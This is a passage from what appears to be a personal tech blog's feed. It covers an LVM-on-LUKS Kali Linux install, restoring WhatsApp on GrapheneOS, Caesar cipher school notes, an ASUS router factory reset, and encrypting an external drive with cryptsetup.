![Set up users and passwords 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/8_1_Set up users and passwords.png)
![Set up users and passwords 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/8_2_Set up users and passwords.png)
![Set up users and passwords 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/8_3_Set up users and passwords.png)

![Detect partition disks](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/1_detect partition disks.png)

## 2. Partition Disks and Configure LVM

This is the most important part of this guide. I will show you, in very detailed steps, how to create an LVM partition with LUKS encryption. Let’s start by clicking on `Manual` on the partition disks screen.

![Manual partitioning](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/2_Manual.png)

### 2.1. GPT Partition Table Creation

Since I was using a KVM virtual machine, this is the initial partition choice screen. Go ahead and click on `Virtual disk 1 (vda)`.

![Initial partition choice 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/3_initial partition choice.png)

Now, it will ask you if you want to create a new empty partition table on this device. Click on `Yes`.

![Initial partition choice 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/3_2_initial partition choice.png)

You should now see a new free space partition table created on the device. Click on this free space, and we will proceed to create a new partition.

![Select new block device](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/4_select new block device.png)

### 2.2. Create ESP Partition

Kali Linux, which uses the Debian installer, requires an EFI System Partition (ESP). Unlike Arch, where the EFI and boot partitions can be combined, we will create a separate partition for the EFI. Click on `Create a new partition` and use the following settings:

![Create ESP 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_1_ESP create.png)

To be safe, I will create a 1 GB ESP partition. Type in `1GB` and click on `Continue`.

![Create ESP 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_2_ESP create.png)

For the location of the new partition, choose `Beginning` and click on `Continue`.

![Create ESP 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_3_ESP create.png)

Now we need to choose the partition type by clicking on `Use as`.

![Create ESP 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_4_ESP create.png)

Choose `EFI System Partition`.

![Create ESP 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_5_ESP create.png)

And now, click on `Done setting up the partition` to finish the ESP partition creation.

![Create ESP 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_6_ESP create.png)

And you should see the new ESP partition created!

![Create ESP 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/5_7_ESP create.png)

### 2.3. Create BOOT Partition

Now, we will create a new partition for the boot partition. Click on `FREE SPACE`.

![Create BOOT 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_1_BOOT create.png)

Click on `Create a new partition`.

![Create BOOT 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_2_BOOT create.png)

Same as with the ESP, I will create a 1 GB BOOT partition. Type in `1GB` and click on `Continue`.

![Create BOOT 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_3_BOOT create.png)

Choose `Beginning` and click on `Continue`.

![Create BOOT 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_4_BOOT create.png)

Again, click on `Use as`, but this time choose `Ext2 file system` as the filesystem.

![Create BOOT 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_5_BOOT create.png)

Now set the mount point by clicking on `Mount point`.

![Create BOOT 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_6_BOOT create.png)

Choose `/boot` as the mount point.

![Create BOOT 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_7_BOOT create.png)

Click on `Done setting up the partition` to finish the BOOT partition creation.

![Create BOOT 8](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_8_BOOT create.png)

And you should see the new BOOT partition created! Keep going, you are almost there!

![Create BOOT 9](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_9_BOOT create.png)

### 2.4. Create LVM Partition

This is the most annoying part of setting up the LVM partition. Click on the remaining `FREE SPACE`.

![Partition table after BOOT creation](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/6_9_BOOT create.png)

Click on `Create a new partition`.

![Create LVM 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_1_LVM create.png)

As an example, I use 100% of the remaining space for the LVM partition. Type in `100%` (or just press `Enter` to accept the default value) and click on `Continue`.

![Create LVM 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_2_LVM create.png)

&gt; **Note:** The screenshot below is mislabeled; it should show the `Use as` step.

Click on `Use as`.

![Create LVM 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_3_LVM create.png)

Choose `physical volume for lvm`.

![Create LVM 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_4_LVM create.png)

Click on `Done setting up the partition` to finish the LVM partition creation.

![Create LVM 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_5_LVM create.png)

The new LVM partition is created! Now, we will configure the Logical Volume Manager.

![Create LVM 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/7_6_LVM create.png)

### 2.5 Configure encrypted volumes

Now we will set up LUKS encryption for the LVM partition. Click on `Configure encrypted volumes`.

![Configure encrypted volumes 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_1_Configure encrypted volumes.png)

Click on `Yes` to write the changes to the disk.

![Configure encrypted volumes 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_2_Configure encrypted volumes.png)

Click on `Create encrypted volumes`.

![Configure encrypted volumes 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_3_Configure encrypted volumes.png)

Select the LVM partition, and click on `Continue`.

![Configure encrypted volumes 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_4_Configure encrypted volumes.png)

Click `Done setting up the partition`.

![Configure encrypted volumes 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_5_Configure encrypted volumes.png)

Click `Finish` to finish the encrypted volumes configuration.

![Configure encrypted volumes 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_6_Configure encrypted volumes.png)

The installer will ask whether you want to erase the data on the partition. Erasing is more secure but takes a long time; you can skip it by clicking on `No`.

![Configure encrypted volumes 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/8_7_Configure encrypted volumes.png)

Enter your preferred password for the LUKS encryption, and click on `Continue`.

![LVM password 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/9_1_LVM password.png)

If your password is shorter than 8 characters, the installer will ask you to confirm it. In my case I don’t care, since this virtual machine exists only for this guide, so I click on `Continue`. For a real installation, pick a strong passphrase.

![LVM password 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/9_2_LVM password.png)

### 2.6. Configure the Logical Volume Manager

This part is about configuring the Logical Volume Manager (LVM). Click on `Configure the Logical Volume Manager`.

![Configure the Logical Volume Manager 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/10_1_Configure the Logical Volume Manager.png)

The installer will ask to write the changes to the disk before creating a new volume group. Click on `Yes`.

![Configure the Logical Volume Manager 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/10_2_Configure the Logical Volume Manager.png)

Click on `Create volume group`.

![Create volume group 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_1_Create volume group.png)

Type the name you want for the volume group. I use `kali`, then click on `Continue`.

![Create volume group 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_2_Create volume group.png)

Select the device you want to add to this volume group by checking its box, and click on `Continue`.

![Create volume group 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_3_Create volume group.png)

Click on `Yes` to write the changes to the disk.

![Create volume group 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_4_Create volume group.png)

To verify that the volume group was created, click on `Display configuration details`.

![Create volume group 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_5_Create volume group.png)

Nice, the volume group is created! Now, we will create the logical volume for the swap partition.

![Create volume group 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/11_6_Create volume group.png)

### 2.7. Create Logical Volume for Swap Partition

We will create two logical volumes: one for the swap partition and one for the root partition. Click on `Create logical volume`.

You might also want a separate home partition, but I don’t create one because I don’t need it.

![Create logical volume swap 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_1_Create logical volume swap.png)

Select the volume group you created before, and click on `Continue`.

![Create logical volume swap 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_2_Create logical volume swap.png)

Type a name for the logical volume. I use `swap`.

![Create logical volume swap 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_3_Create logical volume swap.png)

Type a size for the swap partition. I use `10GB`, then click on `Continue`.

![Create logical volume swap 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_4_Create logical volume swap.png)

To verify that the logical volume was created, click on `Display configuration details`.

![Create logical volume swap 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_5_Create logical volume swap.png)

Nice, the logical volume for the swap partition is created! Now, we will create the logical volume for the root partition.

![Create logical volume swap 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/12_6_Create logical volume swap.png)

### 2.8. Create Logical Volume for Root Partition

Click on `Create logical volume`.

![Create logical volume root 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_1_Create logical volume root.png)

Select the volume group you created before, and click on `Continue`.

![Create logical volume root 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_2_Create logical volume root.png)

Type a name for the logical volume. I use `root`.

![Create logical volume root 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_3_Create logical volume root.png)

Type a size for the root partition. I use `100%` (you can also press `Enter` to accept the default, which is the maximum size), then click on `Continue`.

![Create logical volume root 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_4_Create logical volume root.png)

To verify that the logical volume was created, click on `Display configuration details`.

![Create logical volume root 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_5_Create logical volume root.png)

Nice, the logical volume for the root partition is created! Now, we will format the LVM partitions.

![Create logical volume root 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_6_Create logical volume root.png)

Click the `Finish` button to finish the partitioning.

![Create logical volume root 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_7_Create logical volume root.png)

### 2.9. Format LVM Partitions

Formatting the partitions correctly is important; you should see a partition table similar to the one below :)

Now we will format the logical volumes for the root and swap partitions to make them usable.

![Create logical volume root 8](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/13_8_Create logical volume root.png)

Use arrow keys to select the `root` partition, and press `Enter`.

![Format LVM root 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_1_format LVM root.png)

Click on `Use as`.

![Format LVM root 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_2_format LVM root.png)

Choose `Ext4 journaling file system` as the filesystem, and click on `Done setting up the partition`.

&gt; **NOTE:** You can also choose `btrfs` as the filesystem, which is a good choice if you want snapshots, but I choose `ext4` since this is just for the guide.

![Format LVM root 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_3_format LVM root.png)

Click on `Mount point`.

![Format LVM root 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_4_format LVM root.png)

Choose `/` as the mount point for the root filesystem.

![Format LVM root 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_5_format LVM root.png)

Click on `Done setting up the partition` to finish the root partition format.

![Format LVM root 6](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_6_format LVM root.png)

You should see the root partition with its mount point set to `/`.

![Format LVM root 7](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/14_7_format LVM root.png)

Now, we will format the logical volume for the swap partition, select the `swap` partition, and press `Enter`.

![Format LVM swap 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_1_format LVM swap.png)

Click on `Use as`. Our swap partition will be used as a swap area.

![Format LVM swap 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_2_format LVM swap.png)

Choose `swap area` as the filesystem.

![Format LVM swap 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_3_format LVM swap.png)

Click on `Done setting up the partition` to finish the swap partition format.

![Format LVM swap 4](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_4_format LVM swap.png)

And yes! Our partition table is ready to use!!!

![Format LVM swap 5](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/15_5_format LVM swap.png)

### 2.10. Write the changes to the disk

Now, the partitioning is done, click on `Finish partitioning and write changes to disk`.

![Partition finished 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/16_1_Parition finished.png)

Click on `Yes` to write the changes to the disk.

![Partition finished 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/16_2_Parition finished.png)

The installer will now start installing the base system. Just wait for a while.

![Install the base system](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/3_install/1_Install the base system.png)

## 3. Software Selection

Select the software you want to install. The default selection is usually good enough, but pick the desktop environment that suits you.

![Software selection](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/3_install/2_Software selection.png)

Wait for the installation to finish.

![Select and install software](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/3_install/3_Select and install software.png)

## 4. Reboot the system

After the installation is finished, click on `Continue`. You can now try out your new Kali Linux system by rebooting.

![Finish the installation 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/1_1_Finish the installation.png)
![Finish the installation 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/1_2_Finish the installation.png)

## 5. Booting the system

After rebooting the system, you will see the GRUB boot loader screen :)

![GRUB configuration](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/2_GRUB.png)

## 6. Unlock LUKS

You will be asked to unlock the LUKS encryption, type in the password you set before, and press `Enter`.

![Unlock LUKS 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/3_1_unlock luks.png)
![Unlock LUKS 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/3_2_unlock luks.png)
![Unlock LUKS 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/3_3_unlock luks.png)

![Login screen 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/4_1_login.png)
![Login screen 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/4_2_login.png)

## Check the LVM partition

Wow, you have successfully installed Kali Linux with LVM and LUKS encryption! You can check the LVM partition by running the `lsblk` command.

![List block devices](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/4_finish/5_lsblk.png)

## My feeling

~~Debian is harder to install than Arch Linux. This confirms even more that I’m a CLI guy XD~~

Today, I decided to use WhatsApp on my GrapheneOS device as my main device, rather than just linking it to my old phone. Previously, I had only linked my GrapheneOS to access WhatsApp, but I realized that I was missing out on several features, particularly the backup feature, which required my old device to be turned on. I wanted to keep my old device off, as it was essentially just serving as a second clock. Additionally, I noticed that I couldn&apos;t download images and videos on my GrapheneOS device because it was set up as a linked device. So, I made the switch to make GrapheneOS my primary WhatsApp device.

However, I encountered a problem when trying to restore my chat history from Google Drive. During the restore process, I couldn&apos;t see my Google account, no matter how many times I logged in again. Frustrated, I turned to the internet for solutions on how to restore my chat history on GrapheneOS.

After some research, I discovered that the issue was actually quite simple. The problem stemmed from permission restrictions on GrapheneOS. Specifically, Google Play Services needed the appropriate permissions to access my contacts.

Through this article, I want to share the solution I found for restoring chat history from Google Drive on GrapheneOS. By ensuring that Google Play Services has the necessary permissions, you can successfully restore your WhatsApp chats and enjoy all the features that come with using WhatsApp as your main device.

### Quick Guide

Let’s assume you have a GrapheneOS device and have installed WhatsApp through the GrapheneOS Google Play Mirror. If you want to restore your chat history from Google Drive, here’s a quick guide to help you through the process:

1. **Install Google Play Services**: Make sure you have the sandboxed version of Google Play Services installed on your GrapheneOS device.

2. **Grant Permissions**:
   - Go to Settings &gt; Apps &gt; Google Play Services.
   - Ensure it has access to contacts and storage.

3. **Backup on Old Device**: On your old device, back up your WhatsApp chats by going to WhatsApp settings &gt; Chats &gt; Chat backup.

4. **Install WhatsApp**: Download and install WhatsApp on your GrapheneOS device.

5. **Restore Chats**:
   - Open WhatsApp and verify your phone number.
   - Follow the prompts to restore your chat history from Google Drive.
   - Now you should be able to see your Google account during the restore process.

6. **Finish Setup**: Complete the setup process and you should have your WhatsApp chats restored on your GrapheneOS device.

### Example of GrapheneOS Google Play Services Permission

![GrapheneOS Google Play Services Permission](./featured.png)

## Disable Google Play Services Permission

I’ve noticed that the contacts permission for Google Play Services plays a crucial role in Google login detection. You can enable this permission when you need to log into any Google service, so you won’t have to log in manually again, as you’re already logged in through Google Play Services. The key point is to only allow the permission to access contacts when necessary.

Moreover, I recommend disabling this permission once the restore finishes: Google Play Services doesn’t need access to your contacts afterward, and limiting the permissions you grant it is good practice. The permission only needs to be granted during the restore itself; once your chats are restored, backups continue to work without it, so you can safely turn the contacts permission off again.

## Thanks for the Solution Links

[WhatsApp cannot see Google account for cloud recovery #1122](https://github.com/GrapheneOS/os-issue-tracker/issues/1122). (n.d.). GitHub. Retrieved October 10, 2023, from https://github.com/GrapheneOS/os-issue-tracker/issues/1122</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Caesar Cipher encryption and decryption</title><link>https://ummit.dev//posts/infosec/cryptography/caesar-cipher/</link><guid isPermaLink="true">https://ummit.dev//posts/infosec/cryptography/caesar-cipher/</guid><description>Understand Caesar Cipher substitution encryption technique with step-by-step examples of encryption and decryption processes.</description><pubDate>Wed, 15 Jan 2025 00:00:00 GMT</pubDate><content:encoded>## Introduction

Caesar Cipher is a type of substitution cipher in which each letter in the plaintext is shifted a certain number of places down the alphabet. For example, with a shift of 1, A would be replaced by B, B would become C, and so on. Here is a quick example of the Caesar Cipher encryption and decryption.

- Encryption: shift each letter to the right, i.e., add the shift value
- Decryption: shift each letter to the left, i.e., subtract the shift value

The rest of this article uses a shift of 3 as the working example: A becomes D, B becomes E, and so on.

## Table of A-Z letters

Before we start, let&apos;s create a table of A-Z letters and their corresponding numbers.

| Letter | Number |
|--------|--------|
| A      | 1      |
| B      | 2      |
| C      | 3      |
| D      | 4      |
| E      | 5      |
| F      | 6      |
| G      | 7      |
| H      | 8      |
| I      | 9      |
| J      | 10     |
| K      | 11     |
| L      | 12     |
| M      | 13     |
| N      | 14     |
| O      | 15     |
| P      | 16     |
| Q      | 17     |
| R      | 18     |
| S      | 19     |
| T      | 20     |
| U      | 21     |
| V      | 22     |
| W      | 23     |
| X      | 24     |
| Y      | 25     |
| Z      | 26     |

## Encryption

Let’s assume we have the plaintext `HELLO` and want to encrypt it with a Caesar Cipher using a shift of 3. The encryption process is as follows:

1. Convert each letter of the plaintext to its corresponding number.
2. Shift each number by the specified shift value.
3. Convert each shifted number back to its corresponding letter.

For example, to encrypt the plaintext `HELLO` with a shift of 3:

- H -&gt; 8
- E -&gt; 5
- L -&gt; 12
- L -&gt; 12
- O -&gt; 15

After shifting each number by 3:

- H -&gt; 8 + 3 = 11 -&gt; K
- E -&gt; 5 + 3 = 8 -&gt; H
- L -&gt; 12 + 3 = 15 -&gt; O
- L -&gt; 12 + 3 = 15 -&gt; O
- O -&gt; 15 + 3 = 18 -&gt; R

Therefore, the encrypted text would be `KHOOR`.
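As a quick sanity check, the three steps above can be sketched in Python (a minimal sketch using the A=1 ... Z=26 numbering from the table; it assumes uppercase input with no spaces):

```python
def caesar_encrypt(plaintext, shift):
    """Encrypt uppercase letters by shifting them down the alphabet."""
    out = []
    for ch in plaintext:
        num = ord(ch) - ord("A") + 1             # step 1: letter to number (A=1 ... Z=26)
        shifted = (num + shift - 1) % 26 + 1     # step 2: add the shift, wrapping past Z
        out.append(chr(ord("A") + shifted - 1))  # step 3: number back to letter
    return "".join(out)

print(caesar_encrypt("HELLO", 3))  # KHOOR
```

The `% 26` takes care of letters that would shift past `Z` (more on that in the overflow section below).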

## Decryption

To decrypt the encrypted text `KHOOR` with a shift of 3:

1. Convert each letter of the encrypted text to its corresponding number.
2. Shift each number back by the specified shift value.
3. Convert each shifted number back to its corresponding letter.

For example, to decrypt the encrypted text `KHOOR` with a shift of 3:

- K -&gt; 11
- H -&gt; 8
- O -&gt; 15
- O -&gt; 15
- R -&gt; 18

After shifting each number back by 3:

- K -&gt; 11 - 3 = 8 -&gt; H
- H -&gt; 8 - 3 = 5 -&gt; E
- O -&gt; 15 - 3 = 12 -&gt; L
- O -&gt; 15 - 3 = 12 -&gt; L
- R -&gt; 18 - 3 = 15 -&gt; O

Therefore, the decrypted text would be `HELLO`.
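Decryption is the same sketch with the shift subtracted instead of added (again a minimal sketch assuming uppercase input):

```python
def caesar_decrypt(ciphertext, shift):
    """Reverse the cipher by shifting each letter back up the alphabet."""
    out = []
    for ch in ciphertext:
        num = ord(ch) - ord("A") + 1             # letter to number (A=1 ... Z=26)
        shifted = (num - shift - 1) % 26 + 1     # subtract the shift, wrapping before A
        out.append(chr(ord("A") + shifted - 1))  # number back to letter
    return "".join(out)

print(caesar_decrypt("KHOOR", 3))  # HELLO
```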

## Overflow positions

An overflow position occurs when the shifted number is greater than 26, which can happen even with a shift value as small as 25, as shown below. In this case, we simply subtract 26 from the shifted number to get the correct position.

For example, encrypting `E` with a shift of 25:

- E -&gt; 5 + 25 = 30 -&gt; 30 - 26 = 4 -&gt; D

So the encrypted text would be `D`.

This adjustment is only needed when the shifted number is greater than 26, i.e., when it falls outside the 1-26 range of the table.
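In code, this subtract-26 fix is just modular arithmetic: reducing modulo 26 handles any shift value, no matter how many times it wraps around. A minimal sketch using 0-based positions (A=0 ... Z=25) internally:

```python
def shift_letter(ch, shift):
    """Shift one uppercase letter by any amount; modulo 26 handles the wrap."""
    pos = ord(ch) - ord("A")                   # 0-based position (A=0 ... Z=25)
    return chr(ord("A") + (pos + shift) % 26)  # wrap with modulo, back to a letter

print(shift_letter("E", 25))  # D (5 + 25 = 30, and 30 - 26 = 4, which is D)
print(shift_letter("E", 51))  # also D: 51 wraps around twice, modulo handles it
```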

## Conclusion

Caesar Cipher is a simple encryption technique that can be easily broken by brute force (there are only 25 possible shifts to try). I wrote this only as notes for school. Please don’t use it in a real project; if you need to encrypt data, use a modern algorithm such as AES or RSA.

This tutorial will guide you through hard factory resetting an ASUS router using Method 5.

But wait, why would you need to reset your ASUS router? There are several reasons why you might want to perform a hard factory reset. Some common ones include:

- You forgot the login credentials for your router.
- You want to reset the router to its default settings and return it to a clean initial state.
- The login page is not accessible or not working properly (an ASUS issue).
- The username and password are not working and you can&apos;t access the router&apos;s settings (an ASUS issue): the login form rejects usernames that start with a number, even though the settings page lets you set such a username. (Very weird.)

I wrote this article because I ran into that last issue myself and couldn&apos;t access my router&apos;s settings, so I had to reset the router to its defaults. And yeah, it&apos;s a genuinely weird and frustrating bug.

### Steps to Hard Factory Reset Your ASUS Router

This is Method 5 for hard factory resetting your ASUS router, which requires pressing and holding the WPS button. ***If you don&apos;t have a WPS button, this article is not for you.***

Pretty simple; follow these steps to hard factory reset your ASUS router:

1. **Turn Off Your Router**: Begin by powering off your router by pressing the power button located on the device.

2. **Press and Hold the WPS Button**: Locate the WPS (Wi-Fi Protected Setup) button on your router. Press and hold this button. This step is crucial as it initiates the reset process.

3. **Turn On the Router**: While still holding the WPS button, turn the router back on by pressing the power button. This action will start the router&apos;s boot-up process.

4. **Release the WPS Button**: Keep an eye on the power light indicator. Once you notice that the power light has stopped flashing, you can release the WPS button. This indicates that the router is now in the process of resetting.

After completing these steps, your ASUS router will automatically reboot. Once the reboot is finished, the router will be restored to its factory settings, and you can set it up as if it were new.

### Reconfiguring Your Network Settings

After the hard factory reset completes successfully, you should see a Wi-Fi network named `ASUS_&lt;model&gt;`; this is the default network name. You can connect to this network and access the router&apos;s settings page using the default username and password, which are usually `admin` for both fields.

## Conclusion

The hard factory reset process usually takes around 5-10 minutes to complete. Afterwards, you can reconfigure your network settings and set up your router as needed. This method is useful when you encounter issues with your ASUS router and need to restore it to its default settings.

## References

- [How to Hard Factory Reset ASUS Router? (Method 5) | ASUS SUPPORT](https://www.youtube.com/watch?v=RGONeydSKmo)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Encrypting External Drives with LUKS</title><link>https://ummit.dev//posts/linux/tools/luks/luks-external-encryption/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/luks/luks-external-encryption/</guid><description>This article will guide you through the process of encrypting an external drive with LUKS and mounting it on your GNU/Linux system.</description><pubDate>Sun, 29 Dec 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

Encrypting your external drive is a great way to protect your data from unauthorized access in case the drive is lost or stolen. LUKS (Linux Unified Key Setup) is a popular disk encryption method that allows you to encrypt your drives with ease. This article will guide you through the process of encrypting an external drive with LUKS and mounting it on your GNU/Linux system.

### Prerequisites

Before you begin, make sure you have the following:

- An external drive that you want to encrypt.
- A GNU/Linux system with the `cryptsetup` package installed.

## Step 1: Identify the External Drive

First, you need to identify the device identifier of your external drive. You can do this by plugging in the drive and running the following command:

```bash
lsblk
```

## Step 2: Create a filesystem on the External drive

Before encrypting the drive, you need to use a tool like `gdisk` or `fdisk` to initialize the disk and create a partition. For example, to create a partition on `/dev/sdb`, you can use the following commands:

```bash
sudo gdisk /dev/sdb
o # Create a new empty GUID partition table (GPT)
n # Create a new partition
&lt;Enter&gt; # Use the default partition number
&lt;Enter&gt; # Use the default first sector
&lt;Enter&gt; # Use the default last sector
t # Change the partition type
L # List known partition types
8309 # Enter the partition type code (8309 = Linux LUKS)
w # Write changes to disk
```

If running `lsblk` again doesn&apos;t show the new partition, run the following commands so the system recognizes it:

```bash
sudo sync
sudo partprobe /dev/sdb
```

And now `lsblk` should show the new partition, for example `/dev/sdb1`.

## Step 3: Encrypt the External Drive

To encrypt the external drive, use the `cryptsetup` command with the `luksFormat` option. Replace `/dev/sdb1` with the actual device identifier of your external drive:

```bash
sudo cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha256 --iter-time 10000 --key-size 256 --pbkdf argon2id --use-urandom --verify-passphrase /dev/sdb1

# Type YES (in uppercase) when prompted to confirm overwriting the device
```

You will be prompted to enter a passphrase for the encryption.

## Step 4: Open the Encrypted drive

After encrypting the drive, you need to open it using the `cryptsetup open` command. Replace `/dev/sdb1` with the actual device identifier of your encrypted drive and `yourdrive` with a name you want to assign to the mapped device:

```bash
sudo cryptsetup open /dev/sdb1 yourdrive
```

You will be prompted to enter the passphrase you set during encryption.

## Step 5: Create a Filesystem on the Mapped device

Now that the encrypted drive is open, you can create a filesystem on the mapped device. For example, to create a Btrfs filesystem on `/dev/mapper/yourdrive`, run:

```bash
sudo mkfs.btrfs /dev/mapper/yourdrive
```

## Step 6: Mount the Encrypted Drive

Finally, you can mount the encrypted drive to a directory of your choice. For example, to mount the mapped device `/dev/mapper/yourdrive` at `/mnt/yourdrive`, you can use the following command:

```bash
sudo mount --mkdir /dev/mapper/yourdrive /mnt/yourdrive
```

You can now access the encrypted drive at the specified mount point. To confirm the drive is mounted, run `lsblk` and check that the mapped device shows the mount point.

## Close the Encrypted drive

To close the encrypted drive, you can use the `cryptsetup close` command. Replace `yourdrive` with the name you assigned to the mapped device:

```bash
sudo cryptsetup close yourdrive
```

## Cannot Unmount the Drive

If you are unable to unmount a drive, it is likely that the drive is still in use. You can follow these steps to identify and resolve the issue:

### Step 1: Check for Open Files

Use the `lsof` command to check for any open files on the mount point:

```bash
sudo lsof +D /mnt/yourdrive
```

### Step 2: Identify Processes Using the Mount Point

You can also use the `fuser` command to identify which processes are using the mount point:

```bash
sudo fuser -m /mnt/yourdrive
```

### Step 3: Terminate Specific Processes

If you need to terminate a specific process using the mount point, you can use the following command:

```bash
sudo kill -9 PID
```

### Step 4: Kill Processes Using the Mount Point

If you aren&apos;t sure which process is using the mount point and don&apos;t mind terminating them all, you can kill every process using it; all open files on the drive will be closed.

```bash
sudo fuser -k /mnt/yourdrive
```

### Step 5: Unmount the Encrypted Drive

Once you have closed all processes using the mount point, you can unmount the encrypted drive using the following command:

```bash
sudo umount /mnt/yourdrive
```

### Step 6: Close the Encrypted Drive

Finally, you can close the encrypted drive using the `cryptsetup close` command:

```bash
sudo cryptsetup close yourdrive
```

## Don&apos;t Force Unplugging the Drive

Generally, many people forget to unmount the drive before closing the encrypted mapping, which leaves the drive still in use. Force-unplugging the drive in that state can corrupt it. So it is important to unmount the drive and close the encrypted mapping before unplugging it.

## Conclusion

